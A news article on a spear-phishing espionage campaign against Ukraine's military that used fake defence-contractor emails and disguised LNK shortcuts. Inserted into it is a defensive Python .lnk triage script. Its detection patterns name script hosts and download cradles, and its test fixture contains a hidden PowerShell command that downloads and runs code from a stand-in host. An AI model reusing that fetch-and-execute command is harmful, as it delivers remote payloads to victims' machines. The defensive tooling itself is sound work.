This malware campaign is targeting the military with phony emails from a defence contractor

Spear-phishing attacks against Ukraine are part of a cyber-espionage campaign by a group with potent capabilities.
Written by Danny Palmer, Senior Writer

The Ukrainian government and military are being targeted with spear-phishing attacks as part of a cyber-espionage operation built around dropping powerful malware.

These phishing attacks have been detailed by researchers at cybersecurity firm FireEye, who identified malicious emails being sent to Ukrainian military departments in January this year. The malware is presumably intended to monitor information about the military and political interests of the Ukrainian government.

Malicious emails sent with the subject line "SPEC-20T-MK2-000-ISS-4.10-09-2018STANDARD" purported to be from a UK defence manufacturer and claimed to be following up from a previous meeting and offered "cooperation development with Ukrainian partners". 

Recipients of the emails are invited to download an attachment with the filename "Armtrac-Commercial.7z", which then downloads a zip file containing two Word documents and a malicious LNK file – a shortcut that Windows uses as a reference to the original file, here given a forged extension to impersonate a PDF file and disguised with a Microsoft Word icon.

The LNK file in turn runs a PowerShell script that downloads a second-stage payload from a command-and-control server and drops malware onto the targeted machine, with the purpose of monitoring and stealing sensitive information on the networks of the Ukrainian military.
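The shortcut described above is the piece of this chain a defender can inspect offline before anything runs. The following script, an added example that is not from the article or from FireEye's analysis, implements a minimal parser for the Windows shell link (MS-SHLLINK) format and applies triage heuristics to a shortcut pulled from an archive: a document-style double extension, a script host as the link target, a download cradle or hidden-window flag in the arguments, and an icon borrowed from an Office application while the target is a script host. The two .lnk blobs, the filename "Commercial-Offer.pdf.lnk" and the URL stage2.invalid are constructed test data, not indicators from the campaign.

```python
"""Minimal MS-SHLLINK (.lnk) parser plus triage heuristics for document-
impersonating shortcuts. Added example; every sample here is constructed."""
import re
import struct

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits used here (MS-SHLLINK 2.1.1)
HAS_IDLIST, HAS_LINKINFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELPATH, HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x08, 0x10, 0x20, 0x40, 0x80
STRING_DATA = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
               (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location"))


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shell link, skipping the IDList and LinkInfo."""
    if len(data) < LNK_HEADER_SIZE or data[:4] != struct.pack("<I", LNK_HEADER_SIZE) or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = LNK_HEADER_SIZE
    if flags & HAS_IDLIST:                       # IDListSize (2 bytes) followed by the IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINKINFO:                     # LinkInfoSize includes itself
        off += struct.unpack_from("<I", data, off)[0]
    fields = {}
    for flag, name in STRING_DATA:               # fixed order, each: CountCharacters + chars, no terminator
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        if flags & IS_UNICODE:
            fields[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            fields[name] = data[off:off + count].decode("cp1252", "replace")
            off += count
    return fields


SCRIPT_HOSTS = re.compile(r"^(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|certutil)(\.exe)?$", re.I)
DOWNLOAD_CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression|\biex\b"
                             r"|-enc|frombase64string|net\.webclient|bitstransfer", re.I)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+h(idden)?", re.I)
DOCUMENT_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)\.lnk$", re.I)
OFFICE_ICON = re.compile(r"winword|excel|powerpnt|acrord", re.I)


def triage_lnk(filename: str, data: bytes) -> list:
    """Heuristics applied to a shortcut extracted from a suspicious archive."""
    fields = parse_lnk(data)
    findings = []
    if DOCUMENT_EXT.search(filename):
        findings.append("forged document extension")
    target = fields.get("relative_path", "").replace("/", "\\").rsplit("\\", 1)[-1]
    if SCRIPT_HOSTS.search(target):
        findings.append(f"target is a script host: {target.lower()}")
    args = fields.get("arguments", "")
    if DOWNLOAD_CRADLE.search(args):
        findings.append("download cradle in arguments")
    if HIDDEN_WINDOW.search(args):
        findings.append("hidden window requested")
    if OFFICE_ICON.search(fields.get("icon_location", "")) and SCRIPT_HOSTS.search(target):
        findings.append("document icon borrowed while target is a script host")
    return findings


def _string_data(text: str) -> bytes:
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_lnk(flags: int, relative_path: str, arguments: str = "", icon: str = "") -> bytes:
    """Construct a minimal .lnk for testing (constructed data, not a real sample)."""
    header = (struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<II", flags, 0x20)
              + b"\x00" * 24                      # creation/access/write FILETIMEs
              + struct.pack("<IIIH", 0, 0, 1, 0)   # FileSize, IconIndex, ShowCommand, HotKey
              + b"\x00" * 10)                     # Reserved1..3
    body = b""
    if flags & HAS_IDLIST:                        # one dummy ItemID plus the TerminalID
        idlist = struct.pack("<H", 4) + b"\x1f\x50" + b"\x00\x00"
        body += struct.pack("<H", len(idlist)) + idlist
    if flags & HAS_RELPATH:
        body += _string_data(relative_path)
    if flags & HAS_ARGS:
        body += _string_data(arguments)
    if flags & HAS_ICON:
        body += _string_data(icon)
    return header + body


# Constructed fixtures: a shortcut of the kind described in the article, and a benign one.
MALICIOUS_LNK = build_lnk(
    HAS_IDLIST | HAS_RELPATH | HAS_ARGS | HAS_ICON | IS_UNICODE,
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-NoProfile -WindowStyle Hidden -Command \"IEX (New-Object Net.WebClient).DownloadString('http://stage2.invalid/p')\"",
    r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE")
BENIGN_LNK = build_lnk(HAS_RELPATH | IS_UNICODE, r"..\Documents\notes.docx")

if __name__ == "__main__":
    for name, blob in (("Commercial-Offer.pdf.lnk", MALICIOUS_LNK), ("notes.lnk", BENIGN_LNK)):
        print(name, "->", triage_lnk(name, blob) or ["no findings"])
```

The parser deliberately reads only the header flags and the StringData section, which is where the target path, arguments and icon live; a production triage tool would also walk the ExtraData blocks (for example the tracker block carrying the machine name and MAC of the host that created the shortcut), which are useful attribution artefacts but not needed for the checks above.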

A number of different payloads have been observed being deployed, including open-source Trojan malware families such as QuasarRAT and RatVermin. Some of the malware is incredibly potent, providing a backdoor into infected systems, along with access to passwords and other sensitive information.

The Ukrainian government regularly finds itself on the receiving end of a variety of cyberattacks, but the threat actor believed to be behind this campaign focuses almost exclusively on the country.


Researchers suspect this attack is being conducted by a group based in the Luhansk People's Republic (LPR), which declared independence following political upheaval in 2014. While the group doesn't have the power of a nation-state, this campaign demonstrates how smaller groups can still mount sophisticated, evolving malware attacks.

"While cyber espionage is regularly leveraged as a tool of state power, this capability is not limited to states," John Hultquist, director of intelligence analysis at FireEye, told ZDNet.

"Just as new state actors are consistently drawn to this practice, many substate actors will inevitably develop capabilities as well, especially those with the resources of a state sponsor or nominal control of territory," he added.

Researchers warn that the attacks are still ongoing and that the attackers continue to develop their operations and evolve in what's described as a "highly interactive" approach to campaigns. A list of indicators of compromise has been posted in FireEye's technical analysis of the campaign.
